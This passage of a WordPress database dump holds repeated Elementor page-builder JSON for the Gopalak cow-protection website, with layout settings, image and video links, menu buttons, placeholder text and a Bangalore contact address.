b\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10315,1722,'_elementor_page_assets','a:0:{}'),(10317,1723,'_elementor_edit_mode','builder'),(10318,1723,'_elementor_template_type','wp-page'),(10319,1723,'_elementor_version','3.7.8'),(10320,1723,'_wp_page_template','elementor_canvas'),(10321,1723,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10322,1723,'_elementor_page_assets','a:0:{}'),(10324,1724,'_elementor_edit_mode','builder'),(10325,1724,'_elementor_template_type','wp-page'),(10326,1724,'_elementor_version','3.7.8'),(10327,1724,'_wp_page_template','elementor_canvas'),(10328,1724,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploa